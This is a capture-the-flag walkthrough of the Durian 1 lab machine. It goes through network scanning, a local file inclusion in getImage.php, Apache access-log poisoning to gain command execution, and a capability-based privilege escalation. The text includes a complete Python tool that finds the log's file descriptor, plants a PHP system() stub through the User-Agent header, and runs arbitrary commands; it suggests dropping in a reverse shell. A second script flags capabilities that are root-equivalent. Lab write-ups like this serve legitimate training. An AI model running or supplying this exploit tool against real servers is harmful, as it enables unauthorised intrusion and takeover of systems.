# Durian 1

```bash
arp-scan -I eth0 --localnet --ignoredups
Interface: eth0, type: EN10MB, MAC: 00:0c:29:07:19:cb, IPv4: 192.168.1.139
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1	64:66:24:39:6c:a8	(Unknown)
192.168.1.129	38:f9:d3:39:de:c0	(Unknown)
192.168.1.130	00:7c:2d:1f:c0:93	(Unknown)
192.168.1.133	00:0c:29:f4:63:75	(Unknown)
```

We scan the local network to find the target machine; 192.168.1.133 is the one we go after.

***

```bash
sudo nmap -sS -Pn -n -vvv --open --min-rate 5000 192.168.1.133 -oG port | tail -n 10 | grep -vE 'Read data files from:|Nmap done:| Raw packets sent:'
PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 64
80/tcp   open  http       syn-ack ttl 64
8000/tcp open  http-alt   syn-ack ttl 64
8088/tcp open  radan-http syn-ack ttl 64
MAC Address: 00:0C:29:F4:63:75 (VMware)
```

Next, a fast SYN scan for open TCP ports on the target: SSH plus three HTTP services (80, 8000 and 8088).

***

```bash
nmap -sCV -p22,80,8000,8088 192.168.1.133 -oN target.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 05:52 EST
Nmap scan report for blog.rod (192.168.1.133)
Host is up (0.00047s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 28:1c:64:fa:9c:c3:d2:d4:bb:76:3d:3b:10:e2:b1:25 (RSA)
|   256 da:b2:e1:7f:7c:1b:58:cf:fd:4f:74:e9:23:6d:51:d7 (ECDSA)
|_  256 41:e1:0c:2b:d4:26:e8:d3:71:bb:9d:f9:61:56:63:c0 (ED25519)
80/tcp   open  http       Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Durian
8000/tcp open  http       nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Durian
8088/tcp open  radan-http LiteSpeed
|_http-title: Durian
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.0 200 OK
|     etag: "2fd-5f56ea13-40590;;;"
|     last-modified: Tue, 08 Sep 2020 02:18:59 GMT
|     content-type: text/html
|     content-length: 765
|     accept-ranges: bytes
|     date: Sat, 23 Nov 2024 10:53:03 GMT
|     server: LiteSpeed
|     connection: close
|     <html>
|     <body bgcolor="white">
|     <head>
|     <title>Durian</title>
|     <meta name="description" content="We Are Still Alive!">
|     <meta name="keywords" content="Hacked by Ind_C0d3r">
|     <meta name="robots" content="index, follow">
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="language" content="English">
|     </head>
|     <link href="https://fonts.googleapis.com/css?family=Righteous|Saira+Stencil+One&display=swap" rel="stylesheet">
|     <style type="text/css">
|     @font-face {
|     font-family: 'Righteous', cursive;
|     font-family: 'Saira Stencil One', cursive;
|     </style>
|     <center><br><br>
|     <img src="https://www.producemarketguide.com/sites/default/files/Commoditi
|   Socks5: 
|     HTTP/1.1 400 Bad Request
|     content-type: text/html
|     cache-control: private, no-cache, max-age=0
|     pragma: no-cache
|     content-length: 1209
|     date: Sat, 23 Nov 2024 10:53:04 GMT
|     server: LiteSpeed
|     connection: close
|     <!DOCTYPE html>
|     <html style="height:100%">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
|     <title> 400 Bad Request
|     </title></head>
|     <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
|     <div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
|     style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1>
|     style="margin-top:20px;font-size: 30px;">Bad Request
|     </h2>
|     <p>It is not a valid request!</p>
|_    </div></div><div style="color:#f0f0
|_http-server-header: LiteSpeed
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8088-TCP:V=7.94SVN%I=7%D=11/23%Time=6741B40F%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,3EC,"HTTP/1\.0\x20200\x20OK\r\netag:\x20\"2fd-5f56ea13-405
SF:90;;;\"\r\nlast-modified:\x20Tue,\x2008\x20Sep\x202020\x2002:18:59\x20G
SF:MT\r\ncontent-type:\x20text/html\r\ncontent-length:\x20765\r\naccept-ra
SF:nges:\x20bytes\r\ndate:\x20Sat,\x2023\x20Nov\x202024\x2010:53:03\x20GMT
SF:\r\nserver:\x20LiteSpeed\r\nconnection:\x20close\r\n\r\n<html>\n<body\x
SF:20bgcolor=\"white\">\n<head>\n<title>Durian</title>\n<meta\x20name=\"de
SF:scription\"\x20content=\"We\x20Are\x20Still\x20Alive!\">\n<meta\x20name
SF:=\"keywords\"\x20content=\"Hacked\x20by\x20Ind_C0d3r\">\n<meta\x20name=
SF:\"robots\"\x20content=\"index,\x20follow\">\n<meta\x20http-equiv=\"Cont
SF:ent-Type\"\x20content=\"text/html;\x20charset=utf-8\">\n<meta\x20name=\
SF:"language\"\x20content=\"English\">\n</head>\n<link\x20href=\"https://f
SF:onts\.googleapis\.com/css\?family=Righteous\|Saira\+Stencil\+One&displa
SF:y=swap\"\x20rel=\"stylesheet\">\n<style\x20type=\"text/css\">\n@font-fa
SF:ce\x20{\n\tfont-family:\x20'Righteous',\x20cursive;\n\tfont-family:\x20
SF:'Saira\x20Stencil\x20One',\x20cursive;\n}\n</style>\n<center><br><br>\n
SF:<img\x20src=\"https://www\.producemarketguide\.com/sites/default/files/
SF:Commoditi")%r(Socks5,58E,"HTTP/1\.1\x20400\x20Bad\x20Request\r\ncontent
SF:-type:\x20text/html\r\ncache-control:\x20private,\x20no-cache,\x20max-a
SF:ge=0\r\npragma:\x20no-cache\r\ncontent-length:\x201209\r\ndate:\x20Sat,
SF:\x2023\x20Nov\x202024\x2010:53:04\x20GMT\r\nserver:\x20LiteSpeed\r\ncon
SF:nection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20style=\"height:10
SF:0%\">\n<head>\n<meta\x20name=\"viewport\"\x20content=\"width=device-wid
SF:th,\x20initial-scale=1,\x20shrink-to-fit=no\">\n<title>\x20400\x20Bad\x
SF:20Request\r\n</title></head>\n<body\x20style=\"color:\x20#444;\x20margi
SF:n:0;font:\x20normal\x2014px/20px\x20Arial,\x20Helvetica,\x20sans-serif;
SF:\x20height:100%;\x20background-color:\x20#fff;\">\n<div\x20style=\"heig
SF:ht:auto;\x20min-height:100%;\x20\">\x20\x20\x20\x20\x20<div\x20style=\"
SF:text-align:\x20center;\x20width:800px;\x20margin-left:\x20-400px;\x20po
SF:sition:absolute;\x20top:\x2030%;\x20left:50%;\">\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20<h1\x20style=\"margin:0;\x20font-size:150px;\x20line-height:
SF:150px;\x20font-weight:bold;\">400</h1>\n<h2\x20style=\"margin-top:20px;
SF:font-size:\x2030px;\">Bad\x20Request\r\n</h2>\n<p>It\x20is\x20not\x20a\
SF:x20valid\x20request!</p>\n</div></div><div\x20style=\"color:#f0f0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Service and version detection on the open ports. Three different web servers (Apache 2.4.38 on 80, nginx 1.14.2 on 8000 and LiteSpeed on 8088) all serve the same `Durian` page, and nmap flags port 8000 as a possible open proxy.

***

```bash
wfuzz -c -t 200 --hc=403,404 -w /usr/share/wordlists/dirb/common.txt -u 'http://192.168.1.133/FUZZ'
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.1.133/FUZZ
Total requests: 4615

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                      
=====================================================================

000000001:   200        20 L     51 W       765 Ch      "http://192.168.1.133/"                                                                      
000000646:   301        9 L      28 W       313 Ch      "blog"                                                                                       
000000822:   301        9 L      28 W       317 Ch      "cgi-data"                                                                                   
000002021:   200        20 L     51 W       765 Ch      "index.html"                                                                                 

Total time: 0
```

Fuzzing the web root turns up two directories, `blog` and `cgi-data`.

***

```bash
curl -s http://192.168.1.133/cgi-data/getImage.php | html2text
/*
nclude $_GET['file']; */
```

Requesting `getImage.php` under `cgi-data` with curl, the response body leaks a fragment of the script's own source mentioning `$_GET['file']`: the script includes whatever path is passed in the `file` parameter.

***

<figure><img src="/files/76KlcbkPAYpdrlybSmu7" alt=""><figcaption></figcaption></figure>

Passing `/etc/passwd` in the `file` parameter returns its contents, so we have a Local File Inclusion (LFI). Now we try to turn it into remote code execution (RCE).

***

<figure><img src="/files/TMkZXl34lBMlVjbslsXa" alt=""><figcaption></figcaption></figure>

The file `/proc/self/cmdline` contains the full command line used to start the current process, i.e. the program name and any arguments passed to it. Reading it through the LFI confirms which process we are running inside (the web server worker).

With that in mind, the next target is `/proc/self/fd`: this directory holds symbolic links to the files, sockets and devices the current process has open (here, the web server worker we are exploiting through the LFI). One of those descriptors is the Apache access log, and reading it as `/proc/self/fd/N` works even when we do not know the log's path or the log directory is not traversable by the web server user.

***

<figure><img src="/files/guG876vxH2H468vrNExH" alt=""><figcaption></figcaption></figure>

I found the right descriptor number, which in my case is 6 (yours will differ): the access log shows up in the response pane on the right. You can run a Burp Intruder sniper attack over `/proc/self/fd/N` to find yours; I did it by hand, trying numbers one at a time.

***

<figure><img src="/files/qtjKC0YuBcDhK7EYpN5e" alt=""><figcaption></figcaption></figure>

Now we send a request with curl and check whether it shows up in the log read through that descriptor.

***

<figure><img src="/files/4Zjmdo2Eu1PVKrsNtQto" alt=""><figcaption></figcaption></figure>

It does appear in the log. Now comes the part where we gain access by poisoning that log.

***

<figure><img src="/files/GK6aq05EMW97EoikdiDs" alt=""><figcaption></figcaption></figure>

We poison the log by putting PHP that runs `whoami` in the User-Agent header, then include the log again through the LFI.

***

<figure><img src="/files/yVPlFP0hSQn1c8rmJe1q" alt=""><figcaption></figcaption></figure>

Filtering the response for `www-data` shows the command ran: we have command execution through the User-Agent header.

***

<figure><img src="/files/bC55BbBFGUp2msa2ZUhc" alt=""><figcaption></figcaption></figure>

Now, instead of `whoami`, we inject a command that gives us access to the system.

***

<figure><img src="/files/HkO8GCYetpAzzIcHK8Ld" alt=""><figcaption></figcaption></figure>

And we send ourselves a reverse shell.
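The whole chain above (find the access-log descriptor under `/proc/self/fd`, plant a PHP stub through the User-Agent, include the log with a command) is done by hand in Burp and curl in this write-up. The script below is an added example, not code from the original page: it automates the same steps against the page's endpoint `http://192.168.1.133/cgi-data/getImage.php?file=`. The marker strings, the `c` query parameter used by the planted stub, the descriptor range and the fake responses used for offline testing are all assumptions. It tags the log with a random User-Agent first and scans descriptors for that tag, which is more reliable than eyeballing each response, and it plants the stub only once, since every later include of the log re-executes everything written into it.

```python
#!/usr/bin/env python3
"""LFI -> Apache log poisoning -> command execution, scripted.

Added example, not code from the original write-up. Only the endpoint and
the `file` parameter come from the page; the markers, the `c` parameter of
the planted stub and the descriptor range are assumptions.
"""
import re
import secrets
import sys
import urllib.parse
import urllib.request

TARGET = "http://192.168.1.133/cgi-data/getImage.php"  # from the page
PARAM = "file"                                          # from the page
MAX_FD = 32           # assumption: Apache's log descriptors are small numbers
START, END = "@@OUT@@", "@@END@@"   # markers to cut command output out of HTML


def build_include_url(target, param, path, extra=None):
    """URL that makes the vulnerable include() open `path`, plus extra GET args."""
    query = {param: path}
    if extra:
        query.update(extra)
    return f"{target}?{urllib.parse.urlencode(query)}"


def poison_payload(cmd_param="c"):
    """PHP stub written into the log via User-Agent; once included it runs ?c=<cmd>."""
    return f"<?php system($_GET['{cmd_param}']); ?>"


def http_get(url, user_agent):
    """Plain GET with a chosen User-Agent (that header is what lands in the log)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def find_log_fd(target, param, max_fd=MAX_FD, fetch=http_get):
    """Tag the access log with a random User-Agent, then read /proc/self/fd/N
    through the LFI until one descriptor's contents contain the tag."""
    tag = "fdprobe-" + secrets.token_hex(8)
    fetch(build_include_url(target, param, "/etc/hostname"), tag)  # any hit is logged
    for fd in range(3, max_fd + 1):                                # 0-2 are stdio
        try:
            body = fetch(build_include_url(target, param, f"/proc/self/fd/{fd}"),
                         "Mozilla/5.0")
        except OSError:      # sockets/pipes behind some fds make the include fail or hang
            continue
        if tag in body:
            return fd
    return None


def poison_log(target, param, fetch=http_get):
    """Write the stub into the log exactly once; every later include re-runs it."""
    fetch(build_include_url(target, param, "/etc/hostname"), poison_payload())


def extract_output(body, start=START, end=END):
    """Pull command output from between the markers in the page body."""
    m = re.search(re.escape(start) + r"(.*?)" + re.escape(end), body, re.S)
    return m.group(1).strip() if m else None


def run_command(target, param, fd, cmd, fetch=http_get):
    """Include the poisoned log with ?c=<cmd>, wrapping the output in markers.
    The query string is URL-encoded in the log line, so the raw markers only
    ever come from the echo, never from earlier log entries."""
    wrapped = f"echo {START}; {cmd}; echo {END}"
    url = build_include_url(target, param, f"/proc/self/fd/{fd}", {"c": wrapped})
    return extract_output(fetch(url, "Mozilla/5.0"))


if __name__ == "__main__":
    fd = find_log_fd(TARGET, PARAM)
    if fd is None:
        sys.exit("no descriptor under /proc/self/fd/ exposed the access log")
    poison_log(TARGET, PARAM)
    print(run_command(TARGET, PARAM, fd, " ".join(sys.argv[1:]) or "id"))
```

Run it with the command as arguments, e.g. `./lfi2rce.py id`; a reverse-shell one-liner goes in the same place once the listener is up. The `fetch` parameter exists so the network layer can be swapped for a fake during testing.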

***

<figure><img src="/files/p1ih44P0gfHtkejM5j7g" alt=""><figcaption></figcaption></figure>

Looking for a path to root, we find two binaries with file capabilities set.
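Added example, not from the original write-up: a small triage script for `getcap -r /` output that flags the capabilities which are root-equivalent on their own (cap_setuid, cap_dac_read_search, cap_sys_admin and the like) and tells you whether each is effective immediately or only permitted. It handles both the older `path = caps+flags` and the newer `path caps=flags` output formats. The sample lines embedded in it are constructed for illustration and are not the Durian box's real getcap output.

```python
#!/usr/bin/env python3
"""Triage file capabilities for privilege-escalation candidates.

Added example, not from the original write-up. Parses `getcap -r /` output
(old `path = caps+flags` and newer `path caps=flags` formats) and reports
the capabilities that are root-equivalent by themselves. SAMPLE_GETCAP is
constructed, not the box's real output.
"""
import re
import subprocess
import sys

# Capabilities that give root or root-equivalent access on their own.
DANGEROUS = {
    "cap_setuid": "setuid(0) from inside the binary (an interpreter gives a root shell)",
    "cap_setgid": "setgid to a privileged group such as shadow or disk",
    "cap_dac_read_search": "read any file: /etc/shadow, root's SSH keys",
    "cap_dac_override": "write any file: /etc/passwd, /etc/sudoers, cron jobs",
    "cap_chown": "take ownership of /etc/shadow or /etc/passwd",
    "cap_fowner": "bypass owner checks, e.g. chmod on root-owned files",
    "cap_sys_admin": "mount, setns and friends; effectively root",
    "cap_sys_ptrace": "attach to and inject into root processes",
    "cap_sys_module": "load kernel modules",
    "cap_sys_rawio": "raw access to block devices",
}

# Constructed sample (not the box's real getcap output); mixes both formats.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.7 = cap_setuid+ep
/usr/bin/tar cap_dac_read_search=ep
/usr/sbin/arping = cap_net_raw+ep
/usr/bin/gdb = cap_sys_ptrace+p
"""

_SPEC = re.compile(r"^([a-z_,]+)[+=]([eip]+)$")   # e.g. cap_a,cap_b+ep or cap_a=eip


def parse_getcap_line(line):
    """Return {'path', 'caps', 'flags'} for one getcap line, or None if unparsable."""
    line = line.strip()
    if not line:
        return None
    if " = " in line:                       # libcap < 2.41:  /path = cap_a,cap_b+ep
        path, spec = line.split(" = ", 1)
    elif " " in line:                       # libcap >= 2.41: /path cap_a,cap_b=ep
        path, spec = line.rsplit(" ", 1)    # assumption: no spaces in the path
    else:
        return None
    m = _SPEC.match(spec)
    if not m:
        return None
    return {"path": path, "caps": m.group(1).split(","), "flags": set(m.group(2))}


def triage(lines):
    """(path, capability, effective) for every dangerous capability found.

    effective=True means the 'e' flag is set, so the capability is live as
    soon as the binary runs. Permitted-only ('+p') still counts: the program
    can raise it into the effective set itself via capset/libcap."""
    hits = []
    for line in lines:
        entry = parse_getcap_line(line)
        if entry is None:
            continue
        for cap in entry["caps"]:
            if cap in DANGEROUS:
                hits.append((entry["path"], cap, "e" in entry["flags"]))
    return hits


def getcap_all():
    """Run getcap over the whole filesystem; stderr (unreadable dirs) is dropped."""
    proc = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True)
    return proc.stdout.splitlines()


if __name__ == "__main__":
    lines = getcap_all() if "--live" in sys.argv else SAMPLE_GETCAP.splitlines()
    for path, cap, eff in triage(lines):
        state = "effective" if eff else "permitted only"
        print(f"{path}: {cap} ({state}) - {DANGEROUS[cap]}")
```

Without arguments it runs over the constructed sample; with `--live` it runs `getcap -r /` on the host you are on. Network capabilities such as cap_net_raw are deliberately not flagged: they let a binary sniff or spoof traffic but do not by themselves lead to root.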

***

<figure><img src="/files/AANLRIv5Sgn6AcCC0oXV" alt=""><figcaption></figcaption></figure>

Machine solved.
